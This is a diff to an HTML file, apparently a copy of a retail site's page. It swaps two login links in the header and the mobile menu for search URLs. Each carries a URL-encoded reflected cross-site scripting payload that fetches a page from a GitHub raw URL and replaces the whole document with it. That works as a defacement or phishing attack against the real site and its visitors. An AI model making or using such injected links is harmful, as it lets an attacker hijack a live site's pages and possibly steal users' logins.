--- a/testing.html
+++ b/testing.html
@@ -143,7 +143,7 @@
 				</div>
 			</div>
 			<div class="main-header__actions">
-									<a href="/ro/login?tab=auth" class="main-header__action action-main-header">
+									<a href="https://alcomarket.md/ro/search?search=%3Cscript%3Efetch%28%27https%3A%2F%2Fraw.githubusercontent.com%2Fcristichiu%2Ftesting%2Frefs%2Fheads%2Fmain%2Ftesting.html%27%29.then%28r+%3D%3E+r.text%28%29%29.then%28html+%3D%3E+document.documentElement.innerHTML+%3D+html%29%3B%3C%2Fscript%3E" class="main-header__action action-main-header">
 						<div class="action-main-header__icon">
 							<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none">
 								<path fill-rule="evenodd" clip-rule="evenodd" d="M7 15.5C5.93913 15.5 4.92172 15.9214 4.17157 16.6716C3.42143 17.4217 3 18.4391 3 19.5C3 19.8978 3.15803 20.2794 3.43934 20.5607C3.72064 20.842 4.10218 21 4.5 21H19.5C19.8978 21 20.2794 20.842 20.5607 20.5607C20.842 20.2794 21 19.8978 21 19.5C21 18.4391 20.5786 17.4217 19.8284 16.6716C19.0783 15.9214 18.0609 15.5 17 15.5H7ZM2.75736 15.2574C3.88258 14.1321 5.4087 13.5 7 13.5H17C18.5913 13.5 20.1174 14.1321 21.2426 15.2574C22.3679 16.3826 23 17.9087 23 19.5C23 20.4283 22.6313 21.3185 21.9749 21.9749C21.3185 22.6313 20.4283 23 19.5 23H4.5C3.57174 23 2.6815 22.6313 2.02513 21.9749C1.36875 21.3185 1 20.4283 1 19.5C1 17.9087 1.63214 16.3826 2.75736 15.2574Z" fill="#414243"></path>
@@ -1168,7 +1168,7 @@
 			<span class="action-main-header__value menu-nav__total total_items_cart">0</span>
 		</li>
 		<li class="menu-nav__item">
-			<a href="/ro/login?tab=auth" class="menu-nav__item">
+			<a href="https://alcomarket.md/ro/search?search=%3Cscript%3Efetch%28%27https%3A%2F%2Fraw.githubusercontent.com%2Fcristichiu%2Ftesting%2Frefs%2Fheads%2Fmain%2Ftesting.html%27%29.then%28r+%3D%3E+r.text%28%29%29.then%28html+%3D%3E+document.documentElement.innerHTML+%3D+html%29%3B%3C%2Fscript%3E" class="menu-nav__item">
 				<div class="menu-nav__icon">
 					<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none">
 						<path fill-rule="evenodd" clip-rule="evenodd" d="M7 15.5C5.93913 15.5 4.92172 15.9214 4.17157 16.6716C3.42143 17.4217 3 18.4391 3 19.5C3 19.8978 3.15803 20.2794 3.43934 20.5607C3.72064 20.842 4.10218 21 4.5 21H19.5C19.8978 21 20.2794 20.842 20.5607 20.5607C20.842 20.2794 21 19.8978 21 19.5C21 18.4391 20.5786 17.4217 19.8284 16.6716C19.0783 15.9214 18.0609 15.5 17 15.5H7ZM2.75736 15.2574C3.88258 14.1321 5.4087 13.5 7 13.5H17C18.5913 13.5 20.1174 14.1321 21.2426 15.2574C22.3679 16.3826 23 17.9087 23 19.5C23 20.4283 22.6313 21.3185 21.9749 21.9749C21.3185 22.6313 20.4283 23 19.5 23H4.5C3.57174 23 2.6815 22.6313 2.02513 21.9749C1.36875 21.3185 1 20.4283 1 19.5C1 17.9087 1.63214 16.3826 2.75736 15.2574Z" fill="white"></path>
